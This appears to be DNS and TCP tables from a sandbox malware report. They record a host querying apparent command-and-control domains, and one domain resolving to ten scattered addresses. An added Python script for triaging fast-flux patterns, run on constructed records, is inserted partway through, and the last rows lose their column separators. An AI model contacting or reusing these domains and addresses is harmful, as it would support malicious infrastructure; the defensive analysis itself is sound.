Oct 20, 2024 09:40:23.259813070 CEST | 56660 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:24.259974957 CEST | 56660 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:26.259892941 CEST | 56660 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:29.140971899 CEST | 53 | 56660 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:29.140989065 CEST | 53 | 56660 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:29.140997887 CEST | 53 | 56660 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:29.141005993 CEST | 53 | 56660 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:29.145399094 CEST | 56033 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:29.154721022 CEST | 53 | 56033 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:29.157561064 CEST | 65292 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:30.169682980 CEST | 65292 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:31.182416916 CEST | 65292 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:33.184174061 CEST | 65292 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:37.204145908 CEST | 65292 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:37.993104935 CEST | 53 | 65292 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:37.993119955 CEST | 53 | 65292 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:37.993127108 CEST | 53 | 65292 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:37.993135929 CEST | 53 | 65292 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:37.993146896 CEST | 53 | 65292 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:43.115511894 CEST | 54646 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:44.123583078 CEST | 54646 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:45.124490023 CEST | 54646 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:47.123059034 CEST | 54646 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:51.032890081 CEST | 53 | 54646 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:51.032912016 CEST | 53 | 54646 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:51.032924891 CEST | 53 | 54646 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:51.032937050 CEST | 53 | 54646 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:51.044414043 CEST | 52663 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:51.053415060 CEST | 53 | 52663 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:51.059890032 CEST | 58405 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:52.072747946 CEST | 58405 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:53.074752092 CEST | 58405 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:55.094579935 CEST | 58405 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:59.089540958 CEST | 58405 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 09:40:59.940843105 CEST | 53 | 58405 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:59.940856934 CEST | 53 | 58405 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:59.940874100 CEST | 53 | 58405 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:59.940882921 CEST | 53 | 58405 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 09:40:59.940891027 CEST | 53 | 58405 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 20, 2024 09:37:23.464411974 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ff0 | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:24.477906942 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ff0 | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:25.493490934 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ff0 | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:27.508902073 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ff0 | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:27.705244064 CEST | 192.168.2.4 | 1.1.1.1 | 0x32c7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:28.712131023 CEST | 192.168.2.4 | 1.1.1.1 | 0x32c7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:29.712110996 CEST | 192.168.2.4 | 1.1.1.1 | 0x32c7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:31.727678061 CEST | 192.168.2.4 | 1.1.1.1 | 0x32c7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:35.727746964 CEST | 192.168.2.4 | 1.1.1.1 | 0x32c7 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.217175007 CEST | 192.168.2.4 | 1.1.1.1 | 0xc841 | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.228619099 CEST | 192.168.2.4 | 1.1.1.1 | 0x4471 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:38.227806091 CEST | 192.168.2.4 | 1.1.1.1 | 0x4471 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:51.331573009 CEST | 192.168.2.4 | 1.1.1.1 | 0x995b | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:52.337474108 CEST | 192.168.2.4 | 1.1.1.1 | 0x995b | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.337481976 CEST | 192.168.2.4 | 1.1.1.1 | 0x995b | Standard query (0) | tnc-corp.ru | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:55.068178892 CEST | 192.168.2.4 | 1.1.1.1 | 0x165c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:56.071932077 CEST | 192.168.2.4 | 1.1.1.1 | 0x165c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:57.081801891 CEST | 192.168.2.4 | 1.1.1.1 | 0x165c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:59.087507010 CEST | 192.168.2.4 | 1.1.1.1 | 0x165c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:02.972198963 CEST | 192.168.2.4 | 1.1.1.1 | 0x3880 | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:02.985948086 CEST | 192.168.2.4 | 1.1.1.1 | 0x8207 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:03.994590998 CEST | 192.168.2.4 | 1.1.1.1 | 0x8207 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:05.008824110 CEST | 192.168.2.4 | 1.1.1.1 | 0x8207 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:07.000643969 CEST | 192.168.2.4 | 1.1.1.1 | 0x8207 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:16.004688978 CEST | 192.168.2.4 | 1.1.1.1 | 0xacd | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:17.009521961 CEST | 192.168.2.4 | 1.1.1.1 | 0xacd | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:18.009525061 CEST | 192.168.2.4 | 1.1.1.1 | 0xacd | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:20.009536982 CEST | 192.168.2.4 | 1.1.1.1 | 0xacd | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:20.864247084 CEST | 192.168.2.4 | 1.1.1.1 | 0x91a6 | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:20.882436991 CEST | 192.168.2.4 | 1.1.1.1 | 0xeccf | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:21.874319077 CEST | 192.168.2.4 | 1.1.1.1 | 0xeccf | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:22.891041994 CEST | 192.168.2.4 | 1.1.1.1 | 0xeccf | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:24.885687113 CEST | 192.168.2.4 | 1.1.1.1 | 0xeccf | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:33.099148035 CEST | 192.168.2.4 | 1.1.1.1 | 0xae7c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:34.087735891 CEST | 192.168.2.4 | 1.1.1.1 | 0xae7c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:35.103343964 CEST | 192.168.2.4 | 1.1.1.1 | 0xae7c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:37.118973970 CEST | 192.168.2.4 | 1.1.1.1 | 0xae7c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:41.121043921 CEST | 192.168.2.4 | 1.1.1.1 | 0xae7c | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:42.144233942 CEST | 192.168.2.4 | 1.1.1.1 | 0x605b | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:42.158812046 CEST | 192.168.2.4 | 1.1.1.1 | 0x1106 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:43.166395903 CEST | 192.168.2.4 | 1.1.1.1 | 0x1106 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:44.170075893 CEST | 192.168.2.4 | 1.1.1.1 | 0x1106 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:46.166450024 CEST | 192.168.2.4 | 1.1.1.1 | 0x1106 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:50.182689905 CEST | 192.168.2.4 | 1.1.1.1 | 0x1106 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:57.297740936 CEST | 192.168.2.4 | 1.1.1.1 | 0x360 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:58.291162968 CEST | 192.168.2.4 | 1.1.1.1 | 0x360 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:39:59.306598902 CEST | 192.168.2.4 | 1.1.1.1 | 0x360 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:01.306811094 CEST | 192.168.2.4 | 1.1.1.1 | 0x360 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:05.276205063 CEST | 192.168.2.4 | 1.1.1.1 | 0x93dd | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:05.302545071 CEST | 192.168.2.4 | 1.1.1.1 | 0xffbe | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:06.290985107 CEST | 192.168.2.4 | 1.1.1.1 | 0xffbe | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:07.290999889 CEST | 192.168.2.4 | 1.1.1.1 | 0xffbe | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:22.245542049 CEST | 192.168.2.4 | 1.1.1.1 | 0x898b | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:23.259813070 CEST | 192.168.2.4 | 1.1.1.1 | 0x898b | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:24.259974957 CEST | 192.168.2.4 | 1.1.1.1 | 0x898b | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:26.259892941 CEST | 192.168.2.4 | 1.1.1.1 | 0x898b | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:29.145399094 CEST | 192.168.2.4 | 1.1.1.1 | 0x4a84 | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:29.157561064 CEST | 192.168.2.4 | 1.1.1.1 | 0x263 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:30.169682980 CEST | 192.168.2.4 | 1.1.1.1 | 0x263 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:31.182416916 CEST | 192.168.2.4 | 1.1.1.1 | 0x263 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:33.184174061 CEST | 192.168.2.4 | 1.1.1.1 | 0x263 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:37.204145908 CEST | 192.168.2.4 | 1.1.1.1 | 0x263 | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:43.115511894 CEST | 192.168.2.4 | 1.1.1.1 | 0x2d67 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:44.123583078 CEST | 192.168.2.4 | 1.1.1.1 | 0x2d67 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:45.124490023 CEST | 192.168.2.4 | 1.1.1.1 | 0x2d67 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:47.123059034 CEST | 192.168.2.4 | 1.1.1.1 | 0x2d67 | Standard query (0) | volisc.biz | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:51.044414043 CEST | 192.168.2.4 | 1.1.1.1 | 0xcd97 | Standard query (0) | livbev.online | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:51.059890032 CEST | 192.168.2.4 | 1.1.1.1 | 0x3f1c | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:52.072747946 CEST | 192.168.2.4 | 1.1.1.1 | 0x3f1c | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:53.074752092 CEST | 192.168.2.4 | 1.1.1.1 | 0x3f1c | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:55.094579935 CEST | 192.168.2.4 | 1.1.1.1 | 0x3f1c | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:40:59.089540958 CEST | 192.168.2.4 | 1.1.1.1 | 0x3f1c | Standard query (0) | liverds.at | A (IP address) | IN (0x0001) | false
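Read together, the TCP, UDP and DNS tables show the pattern an analyst triages from a report like this one: the same transaction ID re-sent at roughly 1, 1, 2 and 4 second intervals because 1.1.1.1 had not yet answered, SERVFAIL and NXDOMAIN replies for the configured domains, one name (tnc-corp.ru) eventually resolving to ten addresses in unrelated ranges, and TCP connections on port 80 going to the first of those addresses (211.171.233.126). The script below is an added example, not part of the Joe Sandbox report or its tooling. It runs over hand-constructed records modelled on rows from these tables (they are not parsed from the report), counts retransmissions per transaction ID, measures how widely an answer set is spread across /8 networks, and maps each TCP destination back to the name that resolved to it. The thresholds in flag_fast_flux() are illustrative assumptions, and "many addresses across many /8s" is a triage signal that legitimate CDNs can also trigger, not a verdict on its own.

```python
"""Summarise sandbox DNS and TCP records and flag C2 resolution patterns.

Added example, not part of the Joe Sandbox report. The records below are
constructed to mirror rows from the report's DNS query, DNS answer and TCP
tables; the thresholds in flag_fast_flux() are assumptions for illustration.
"""
from collections import Counter, defaultdict
from ipaddress import ip_network

# Constructed: (timestamp, transaction id, queried name), client -> 1.1.1.1.
DNS_QUERIES = [
    ("09:37:23.464", 0x4FF0, "tnc-corp.ru"),
    ("09:37:24.477", 0x4FF0, "tnc-corp.ru"),
    ("09:37:25.493", 0x4FF0, "tnc-corp.ru"),
    ("09:37:27.508", 0x4FF0, "tnc-corp.ru"),
    ("09:37:37.217", 0xC841, "livbev.online"),
    ("09:37:37.228", 0x4471, "liverds.at"),
    ("09:37:38.227", 0x4471, "liverds.at"),
    ("09:38:51.331", 0x995B, "tnc-corp.ru"),
    ("09:38:52.337", 0x995B, "tnc-corp.ru"),
    ("09:38:53.337", 0x995B, "tnc-corp.ru"),
]

# Constructed: (transaction id, reply code, name, A record or None), 1.1.1.1 -> client.
# Reply codes: 0 NoError, 2 ServFail, 3 NXDomain.
DNS_ANSWERS = [
    (0x4FF0, 2, "tnc-corp.ru", None),
    (0xC841, 3, "livbev.online", None),
    (0x4471, 2, "liverds.at", None),
] + [
    (0x995B, 0, "tnc-corp.ru", addr)
    for addr in (
        "211.171.233.126", "189.195.132.134", "190.249.249.14", "181.123.219.23",
        "190.224.203.37", "201.191.99.134", "211.202.224.10", "187.156.6.228",
        "197.164.156.210", "125.7.253.10",
    )
]

# Constructed: (src ip, src port, dst ip, dst port), one entry per outbound TCP flow.
TCP_FLOWS = [
    ("192.168.2.4", 54853, "211.171.233.126", 80),
    ("192.168.2.4", 54854, "211.171.233.126", 80),
]


def query_attempts(queries):
    """Count how many times each (name, transaction id) pair was sent.

    A stub resolver re-sends with the same transaction id when no reply
    arrives, so a count above 1 means the upstream did not answer in time.
    """
    attempts = defaultdict(Counter)
    for _ts, txid, name in queries:
        attempts[name][txid] += 1
    return attempts


def resolution_summary(answers):
    """Collect the set of reply codes and the set of A records per name."""
    summary = defaultdict(lambda: {"rcodes": set(), "addresses": set()})
    for _txid, rcode, name, addr in answers:
        summary[name]["rcodes"].add(rcode)
        if addr is not None:
            summary[name]["addresses"].add(addr)
    return summary


def distinct_prefixes(addresses, prefixlen=8):
    """Number of distinct IPv4 networks of the given length that cover the addresses."""
    return len({ip_network(f"{a}/{prefixlen}", strict=False) for a in addresses})


def flag_fast_flux(summary, min_answers=5, min_prefixes=4):
    """Names whose answer set is large and spread over many /8s.

    Thresholds are illustrative assumptions. A CDN also returns several
    addresses, so treat a hit as a reason to look closer, not as a verdict.
    """
    flagged = []
    for name, info in summary.items():
        addrs = info["addresses"]
        if len(addrs) >= min_answers and distinct_prefixes(addrs) >= min_prefixes:
            flagged.append(name)
    return sorted(flagged)


def correlate_flows(flows, summary):
    """Map each TCP destination address to the name whose answers contained it."""
    owner = {}
    for name, info in summary.items():
        for addr in info["addresses"]:
            owner[addr] = name
    return {dst: owner.get(dst) for _src, _sport, dst, _dport in flows}


if __name__ == "__main__":
    summary = resolution_summary(DNS_ANSWERS)
    for name, txids in query_attempts(DNS_QUERIES).items():
        print(name, dict(txids), sorted(summary[name]["rcodes"]))
    print("wide answer sets:", flag_fast_flux(summary))
    print("TCP targets:", correlate_flows(TCP_FLOWS, summary))
```

The same functions work unchanged on rows exported from a pcap (for example via tshark's `-T fields` output) once they are shaped into the tuples above; the constructed lists only stand in for that export so the script runs offline.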
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 20, 2024 09:37:27.701919079 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ff0 | Server failure (2) | tnc-corp.ru | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:27.701935053 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ff0 | Server failure (2) | tnc-corp.ru | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:27.701941013 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ff0 | Server failure (2) | tnc-corp.ru | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:27.701946020 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ff0 | Server failure (2) | tnc-corp.ru | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.214426041 CEST | 1.1.1.1 | 192.168.2.4 | 0x32c7 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.214464903 CEST | 1.1.1.1 | 192.168.2.4 | 0x32c7 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.214497089 CEST | 1.1.1.1 | 192.168.2.4 | 0x32c7 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.214525938 CEST | 1.1.1.1 | 192.168.2.4 | 0x32c7 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.214561939 CEST | 1.1.1.1 | 192.168.2.4 | 0x32c7 | Server failure (2) | volisc.biz | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:37.226423025 CEST | 1.1.1.1 | 192.168.2.4 | 0xc841 | Name error (3) | livbev.online | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:37:45.312041044 CEST | 1.1.1.1 | 192.168.2.4 | 0x4471 | Server failure (2) | liverds.at | none | none | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 189.195.132.134 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 181.123.219.23 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 190.224.203.37 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 201.191.99.134 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 211.202.224.10 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 187.156.6.228 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 197.164.156.210 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862907887 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 125.7.253.10 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 189.195.132.134 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 181.123.219.23 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 190.224.203.37 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 201.191.99.134 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 211.202.224.10 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 187.156.6.228 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 197.164.156.210 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862921953 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 125.7.253.10 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 189.195.132.134 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 181.123.219.23 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 190.224.203.37 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 201.191.99.134 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 211.202.224.10 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 187.156.6.228 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 09:38:53.862989902 CEST | 1.1.1.1 | 192.168.2.4 | 0x995b | No error (0) | tnc-corp.ru |  | 197.164.156.210 | A (IP address) | IN (0x0001) | false
                                            Oct 20, 2024 09:38:53.862989902 CEST1.1.1.1192.168.2.40x995bNo error (0)tnc-corp.ru125.7.253.10A (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967356920 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967367887 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967375994 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.967389107 CEST1.1.1.1192.168.2.40x165cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:02.981376886 CEST1.1.1.1192.168.2.40x3880Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781418085 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781434059 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781441927 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:10.781451941 CEST1.1.1.1192.168.2.40x8207Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.848484993 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.848506927 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
